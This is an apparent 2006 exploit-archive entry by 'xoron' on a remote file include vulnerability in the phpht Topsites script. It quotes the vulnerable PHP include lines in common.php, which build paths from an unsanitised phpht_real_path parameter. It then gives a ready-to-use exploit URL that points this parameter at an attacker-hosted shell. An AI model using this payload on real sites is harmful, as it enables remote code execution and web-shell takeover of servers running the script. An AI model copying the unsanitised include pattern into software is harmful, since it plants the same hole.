[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpht Topsites (common.php) Remote File Include Vulnerability
# Published : 2006-10-12
# Author : xoron
# Previous Title : phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability
# Next Title : Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
phpht Topsites (phpht_real_path) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Author: xoron
www.xoron.biz - www.xoron.info
Ne mutlu T¨¹rk¨¹m Diyene..!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL:
http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHPht%20Topsites.zip
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CODE:
include($phpht_real_path . 'config.'.$phpEx);
include($phpht_real_path . 'includes/db.'.$phpEx);
include($phpht_real_path . 'includes/Template.'.$phpEx);
include($phpht_real_path . 'language/lang_english/lang_main.'.$phpEx);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.hedef.com/[script_path]/common.php?phpht_real_path=http://sh3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: chaos, nukedx, OG, Preddy, Ironfist, SHiKaA, ERNE :)
Special: Str0ke
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# www.Syue.com [2006-10-12]